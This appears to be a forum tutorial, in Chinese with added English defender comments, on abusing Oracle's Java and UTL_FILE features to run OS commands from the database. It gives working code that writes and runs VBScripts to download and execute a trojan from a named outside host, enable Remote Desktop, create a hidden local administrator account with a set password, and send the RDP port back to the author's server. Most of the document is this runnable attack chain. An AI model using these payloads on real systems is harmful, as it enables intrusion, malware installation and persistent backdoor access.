if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1)
return true;
else
return false;
}
};
/
-- PL/SQL call spec that binds host_command to the static Java method
-- Host.executeCommand(String). The Host class itself is defined above this
-- point (only the tail of its isWindows-style check is visible at the top
-- of the page), so what executeCommand does with p_command is not shown
-- here -- presumably it spawns an OS process, given the grants that follow.
-- Whatever it runs, it runs as the OS account the database server runs as.
-- Defender notes: LANGUAGE JAVA call specs are visible in DBA_SOURCE and
-- the loaded class in DBA_OBJECTS (object_type 'JAVA SOURCE'/'JAVA CLASS');
-- creating either needs CREATE PROCEDURE plus a Java policy grant, so both
-- the DDL and the DBMS_JAVA.GRANT_PERMISSION calls are audit points.
Create or REPLACE PROCEDURE host_command (p_command IN VARCHAR2)
AS LANGUAGE JAVA
NAME 'Host.executeCommand (java.lang.String)';
/
-- Java security-policy grants to the SYSTEM schema so its loaded Java code
-- may touch the file system and raw file descriptors. The FilePermission
-- target on the first line ('<>') looks mangled by extraction (angle
-- brackets stripped); whatever it originally was, a FilePermission carrying
-- read, write, execute and delete granted to a schema is effectively
-- unrestricted OS file access from inside the database.
-- Defender notes: these grants persist in DBA_JAVA_POLICY; review that view
-- for FilePermission / RuntimePermission rows held by ordinary schemas and
-- alert on DBMS_JAVA.GRANT_PERMISSION in the audit trail.
EXEC DBMS_JAVA.grant_permission('SYSTEM', 'java.io.FilePermission', '<>', 'read ,write, execute, delete');
-- RuntimePermission read/writeFileDescriptor: needed to talk to a spawned
-- child's stdin/stdout pipes.
EXEC Dbms_Java.Grant_Permission('SYSTEM', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '');
EXEC Dbms_Java.Grant_Permission('SYSTEM', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', '');
/
-- Anonymous block: runs one OS command through host_command and pulls the
-- captured output back out of the DBMS_OUTPUT buffer. 'dir C:\' is a
-- Windows-only command; the author's note below says to adjust it on Linux.
-- Defender notes: the pairing of DBMS_JAVA.SET_OUTPUT with a LANGUAGE JAVA
-- call spec in the same session is a usable audit signature.
DECLARE
-- receives the buffered lines from get_lines
l_output DBMS_OUTPUT.chararr;
-- upper bound on lines to fetch (IN OUT: get_lines sets it to the count fetched)
l_lines INTEGER := 1000;
BEGIN
-- enlarge the buffers so long command output is not truncated
DBMS_OUTPUT.enable(1000000);
-- route the Java side's System.out into the DBMS_OUTPUT buffer
DBMS_JAVA.set_output(1000000);
host_command('dir C:\');
-- fetched lines are left in l_output; nothing in this block displays them
DBMS_OUTPUT.get_lines(l_output, l_lines);
END;这个要注意两点
win下注意系统路径
linux下注意注释掉win的部分
最后一句就是执行命令的
-- Standalone call as shown in the forum's code box: same Windows-only
-- command as in the block above; requires host_command and the Java policy
-- grants to exist first, and its output only appears with serveroutput on.
host_command('dir C:\');
host_command('dir C:\');
no3.
-- Java stored source loaded as schema object "util": one static helper that
-- spawns an OS process from inside the database session. RUN_CMz / RC
-- further down are the PL/SQL bindings to it.
-- Defender notes: JAVA SOURCE objects appear in DBA_OBJECTS; Runtime.exec
-- inside a DB-loaded class is the thing to grep for in source review, and
-- the child process of the oracle service process is where host-based
-- monitoring will see it.
create or replace and compile
java souRCe named "util"
as
import java.io.*;
import java.lang.*;
public class util extends Object
{
// Runs `args` as an OS command (Runtime.exec(String) tokenises the string
// itself), copies the child's stdout to System.out -- which
// DBMS_JAVA.set_output can route into DBMS_OUTPUT -- and returns the
// child's exit code, or -1 if starting or waiting on it threw.
public static int RunThis(String args)
{
Runtime rt = Runtime.getRuntime();
// -1 is both the "not started" default and the error value
int RC = -1;
try
{
Process p = rt.exec(args);
int bufSize = 4096;
BufferedInputStream bis =new BufferedInputStream(p.getInputStream(), bufSize);
int len;
byte buffer[] = new byte[bufSize];
// Echo back what the program spit out
while ((len = bis.read(buffer, 0, bufSize)) != -1)
System.out.write(buffer, 0, len);
// blocks until the child exits; its exit status becomes the return value
RC = p.waitFor();
}
catch (Exception e)
{
// stack trace goes to System.err, not to the DBMS_OUTPUT buffer
e.printStackTrace();
RC = -1;
}
finally
{
// returning from finally discards any exception still propagating
// (javac warns about this); the input stream is never closed either.
return RC;
}
}
}
/
-- Call spec exposing util.RunThis as a SQL function; the Java int exit code
-- is mapped to NUMBER. The identifier is written RUN_CMz, but unquoted it is
-- folded to RUN_CMZ, which is why the lower-case run_cmz calls below resolve.
create or replace
function RUN_CMz(p_cmd in varchar2) return number
as
language java
name 'util.RunThis(java.lang.String) return integer';
/
-- Procedure wrapper around RUN_CMz that discards the exit code, so a command
-- can be run from EXEC without declaring a bind variable.
create or replace procedure RC(p_cmd in varChar)
as
-- receives RUN_CMz's result; assigned and then dropped
x number;
begin
x := RUN_CMz(p_cmd);
end;
/
-- SQL*Plus session setup for the calls that follow: a bind variable to
-- receive RUN_CMz's return value, DBMS_OUTPUT display on, Java System.out
-- routed into DBMS_OUTPUT, and the predefined JAVASYSPRIV role (broad Java
-- runtime/file permissions) granted to SYSTEM so RunThis may call
-- Runtime.exec at all.
-- Defender notes: JAVASYSPRIV / JAVA_ADMIN are rarely needed by application
-- schemas; check DBA_ROLE_PRIVS for them and alert on new grants.
variable x number;
set serveroutput on;
exec dbms_java.set_output(100000);
grant javasyspriv to system;
-- Duplicate of the "util" Java source above (the forum page renders each
-- code box twice). Same static helper: spawns an OS process via
-- Runtime.exec, echoes its stdout to System.out, returns the exit code or
-- -1 on exception. Same audit signals: JAVA SOURCE object in DBA_OBJECTS,
-- Runtime.exec in a DB-loaded class, child process of the oracle process.
create or replace and compile
java souRCe named "util"
as
import java.io.*;
import java.lang.*;
public class util extends Object
{
// Run `args` as an OS command; stdout is copied to System.out, the child's
// exit code is returned, -1 on failure.
public static int RunThis(String args)
{
Runtime rt = Runtime.getRuntime();
int RC = -1;
try
{
Process p = rt.exec(args);
int bufSize = 4096;
BufferedInputStream bis =new BufferedInputStream(p.getInputStream(), bufSize);
int len;
byte buffer[] = new byte[bufSize];
// Echo back what the program spit out
while ((len = bis.read(buffer, 0, bufSize)) != -1)
System.out.write(buffer, 0, len);
RC = p.waitFor();
}
catch (Exception e)
{
e.printStackTrace();
RC = -1;
}
finally
{
// return inside finally swallows any propagating exception
return RC;
}
}
}
/
-- Duplicate of the RUN_CMz call spec above: exposes util.RunThis as a SQL
-- function returning the exit code as NUMBER.
create or replace
function RUN_CMz(p_cmd in varchar2) return number
as
language java
name 'util.RunThis(java.lang.String) return integer';
/
-- Duplicate of procedure RC above: calls RUN_CMz and discards the exit code.
create or replace procedure RC(p_cmd in varChar)
as
x number;
begin
x := RUN_CMz(p_cmd);
end;
/
-- Duplicate of the SQL*Plus session setup above: bind variable for the
-- exit code, serveroutput on, Java System.out routed into DBMS_OUTPUT.
variable x number;
set serveroutput on;
exec dbms_java.set_output(100000);
grant javasyspriv to system;
这句注意最后这里要授权下当前登录的用户
-- Repeated JAVASYSPRIV grant as shown in the forum's code box (no
-- terminating ';' here, so SQL*Plus will wait for one or for '/'). The
-- author's note says the grantee should be whichever user is logged in,
-- not necessarily SYSTEM.
-- Defender notes: DBA_ROLE_PRIVS where GRANTED_ROLE = 'JAVASYSPRIV'.
grant javasyspriv to system
grant javasyspriv to system
最后执行
-- Runs ipconfig through the Java helper: the exit code lands in :x and the
-- command's stdout in DBMS_OUTPUT (displayed because serveroutput is on).
-- Defender notes: ipconfig.exe as a child of the oracle service process.
exec :x:=run_cmz('ipconfig');
exec :x:=run_cmz('ipconfig');
第二部分 操作磁盘文件
no1.
建立目录
-- Directory object pointing at the drive root; every UTL_FILE write below
-- goes through it. Requires CREATE ANY DIRECTORY.
-- Defender notes: DBA_DIRECTORIES entries that resolve to a drive root or a
-- system directory are worth an alert on creation; UTL_FILE can only write
-- where a directory object points, so this is the enabling step.
create or replace directory DIR as 'C:\';
create or replace directory DIR as 'C:\';
此目录当然也可以是启动目录
授权
-- Object privileges on the directory for SYSTEM (unterminated here; the
-- author says this step is optional, which holds when the caller already
-- owns the directory or has broad privileges).
-- Defender notes: DBA_TAB_PRIVS with TYPE = 'DIRECTORY' lists who can write
-- through each directory object.
grant read, write on directory DIR to system
grant read, write on directory DIR to system
这步可以不用
然后执行操作
写文件
-- Writes a VBScript "downloader" through the DIR directory object (c:\test.vbs
-- given the DIR definition above). When run by cscript, the script fetches a
-- remote executable over HTTP via Microsoft.XMLHTTP and stores it as
-- c:\rad.exe through ADODB.Stream; the two exec lines after this block run
-- the script and then the binary.
-- Defender notes: UTL_FILE.FOPEN in write mode on a directory object that
-- points at a drive root is the first signal; cscript.exe and rad.exe as
-- children of the oracle service process and outbound HTTP from the DB host
-- to blog.cnmoker.org (the host embedded in the literal) are the others.
-- Mitigation: no CREATE ANY DIRECTORY for application schemas, and egress
-- filtering from database hosts.
declare
-- UTL_FILE handle; mode 'W' creates or truncates the target
file utl_file.file_type;
begin
file := utl_file.fopen('DIR', 'test.vbs', 'W');
-- the whole VBScript is a single multi-line string literal
utl_file.put_line(file, 'Set xPost=CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http:/ /blog.cnmoker.org/rad.exe",0
xPost.Send()
Set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "c:\rad.exe",2');
-- flush, then close; the file is complete on disk only after fclose
utl_file.fflush(file);
utl_file.fclose(file);
end;
/
-- Runs the dropped script with cscript, then launches what it saved.
-- Defender notes: cscript.exe with a script under c:\ and then c:\rad.exe,
-- both spawned by the oracle service process; the executable's hash is
-- whatever was served, so treat the download path, not a hash, as the IoC.
exec :x:=run_cmz('cscript c:\test.vbs');
/
exec :x:=run_cmz('c:\rad.exe');
-- Duplicate of the test.vbs writer above (forum renders each code box twice):
-- drops a VBScript that downloads a remote executable to c:\rad.exe. Same
-- signals: UTL_FILE write through DIR, cscript.exe child of the oracle
-- process, outbound HTTP to blog.cnmoker.org.
declare
file utl_file.file_type;
begin
file := utl_file.fopen('DIR', 'test.vbs', 'W');
utl_file.put_line(file, 'Set xPost=CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http:/ /blog.cnmoker.org/rad.exe",0
xPost.Send()
Set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "c:\rad.exe",2');
utl_file.fflush(file);
utl_file.fclose(file);
end;
/
-- Duplicate of the cscript invocation above: runs the dropped c:\test.vbs.
exec :x:=run_cmz('cscript c:\test.vbs');
/
exec :x:=run_cmz('c:\rad.exe');
这步操作将下载我的木马到c盘并执行
-- Writes c:\3389.vbs: a VBScript that reads the RDP listener port and the
-- fDenyTSConnections flag from HKLM and, when the flag is not 0, writes 0 to
-- it -- i.e. turns Remote Desktop on. TSPort is read but not used in this
-- variant; the empty 'If TSState=0 Then' branch is the author's way of
-- writing "unless already enabled".
-- Defender notes: a registry value set on
-- HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections
-- by cscript.exe (Sysmon event 13, or Windows 4657 with object auditing on)
-- under the database service account is the alert; the PortNumber read on
-- the RDP-Tcp key is a weaker companion signal.
declare
-- UTL_FILE handle; 'W' creates or truncates c:\3389.vbs
file utl_file.file_type;
begin
file := utl_file.fopen('DIR', '3389.vbs', 'W');
-- entire script as one multi-line string literal
utl_file.put_line(file, 'Dim OperationRegistry
Set OperationRegistry=WScript.createObject("WScript.Shell")
Dim TSPort,TSState,TSRegPath
TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber"
TSPort=OperationRegistry.RegRead(TSRegPath)
TSRegPath="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections"
TSState=OperationRegistry.RegRead(TSRegPath)
If TSState=0 Then
Else
OperationRegistry.RegWrite TSRegPath,0,"REG_DWORD"
End If');
utl_file.fflush(file);
utl_file.fclose(file);
end;
/
-- Runs the dropped registry script; the registry write above happens here,
-- in a cscript.exe child of the oracle service process.
exec :x:=run_cmz('cscript c:\3389.vbs');
-- Duplicate of the 3389.vbs writer above (forum renders each code box
-- twice): drops a VBScript that sets fDenyTSConnections to 0 in HKLM.
-- Same signal: registry value set by cscript.exe under the DB service
-- account (Sysmon event 13 / Windows 4657).
declare
file utl_file.file_type;
begin
file := utl_file.fopen('DIR', '3389.vbs', 'W');
utl_file.put_line(file, 'Dim OperationRegistry
Set OperationRegistry=WScript.createObject("WScript.Shell")
Dim TSPort,TSState,TSRegPath
TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber"
TSPort=OperationRegistry.RegRead(TSRegPath)
TSRegPath="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections"
TSState=OperationRegistry.RegRead(TSRegPath)
If TSState=0 Then
Else
OperationRegistry.RegWrite TSRegPath,0,"REG_DWORD"
End If');
utl_file.fflush(file);
utl_file.fclose(file);
end;
/
exec :x:=run_cmz('cscript c:\3389.vbs');
vbs开启3389
-- Writes c:\user.vbs: a VBScript that uses the ADSI WinNT provider to create
-- a local account named bob with the password embedded in the literal, add
-- it to the local Administrators group, and then delete the script by its
-- relative name. The '||'&'||' on the second line of the literal is PL/SQL
-- concatenation yielding a bare & in the VBS -- presumably so SQL*Plus does
-- not treat & as a substitution variable.
-- Defender notes: Security events 4720 (user account created) and 4732
-- (member added to a security-enabled local group) with cscript.exe as the
-- process, under the database service account. Forensics: DeleteFile uses a
-- relative path, so whether user.vbs survives depends on cscript's working
-- directory -- check both c:\ and the oracle process's cwd.
declare
-- UTL_FILE handle; 'W' creates or truncates c:\user.vbs
file utl_file.file_type;
begin
file := utl_file.fopen('DIR', 'user.vbs', 'W');
-- script body as one multi-line literal (with the & spliced in via ||)
utl_file.put_line(file, 'set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"'||'&'||'wsnetwork.ComputerName
Set oa=CreateObject("Scripting.FileSystemObject")
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","bob")
od.SetPassword "123456abc!@#"
od.SetInfo
Set of=GetObject(os&"/bob",user)
oe.add os&"/bob"
oa.DeleteFile("user.vbs")');
utl_file.fflush(file);
utl_file.fclose(file);
end;
/
/
-- Runs the dropped account-creation script via cscript; the 4720/4732 events
-- noted above are raised here. (The doubled '/' before this line re-executes
-- the SQL*Plus buffer, i.e. the preceding anonymous block runs twice.)
exec :x:=run_cmz('cscript c:\user.vbs');
-- Duplicate of the user.vbs writer above (forum renders each code box
-- twice): drops a VBScript that creates local user bob and adds it to
-- Administrators via ADSI. Same signals: Security 4720 / 4732 from
-- cscript.exe under the DB service account.
declare
file utl_file.file_type;
begin
file := utl_file.fopen('DIR', 'user.vbs', 'W');
utl_file.put_line(file, 'set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"'||'&'||'wsnetwork.ComputerName
Set oa=CreateObject("Scripting.FileSystemObject")
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","bob")
od.SetPassword "123456abc!@#"
od.SetInfo
Set of=GetObject(os&"/bob",user)
oe.add os&"/bob"
oa.DeleteFile("user.vbs")');
utl_file.fflush(file);
utl_file.fclose(file);
end;
/
/
exec :x:=run_cmz('cscript c:\user.vbs');
无net添加admin用户
-- Writes c:\3389p.vbs, a combined variant of the scripts above: reads the
-- RDP listener port from HKLM, reports it to the author's server in an HTTP
-- GET (the URL is split across two lines of the literal and spliced with
-- PL/SQL concatenation), enables Remote Desktop by writing
-- fDenyTSConnections=0, then uses sc.exe to set TermService to demand start
-- and restart it so the change takes effect.
-- Defender notes: besides the registry-write and cscript.exe signals already
-- noted for 3389.vbs -- sc.exe spawned by cscript.exe, System event 7040
-- (service start type changed) for TermService, and an outbound GET to
-- blog.cnmoker.org carrying the RDP port in the query string.
declare
-- UTL_FILE handle; 'W' creates or truncates c:\3389p.vbs
file utl_file.file_type;
begin
file := utl_file.fopen('DIR', '3389p.vbs', 'W');
-- script body as one multi-line literal; the URL line is assembled with ||
utl_file.put_line(file, '
Dim OperationRegistry
Set OperationRegistry=WScript.createObject("WScript.Shell")
Dim TSPort,TSState,TSRegPath
TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber"
TSPort=OperationRegistry.RegRead(TSRegPath)
Set xPost=CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://blog.cnmoker.org/read3389/ro.
asp?port=" '||'ccccc'||' TSPort,0
xPost.Send()
TSRegPath="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections"
TSState=OperationRegistry.RegRead(TSRegPath)
If TSState=0 Then
Else
OperationRegistry.RegWrite TSRegPath,0,"REG_DWORD"
End If
set obj=wscript.createObject("wscript.shell")
obj.Run("sc config TermService start= demand")
obj.Run("sc stop TermService")
obj.Run("sc start TermService")
wscript.quit
');
utl_file.fflush(file);
utl_file.fclose(file);
end;
/
-- Runs the combined script; the registry write, the sc.exe service changes
-- and the outbound beacon all occur here under the database service account.
exec :x:=run_cmz('cscript c:\3389p.vbs');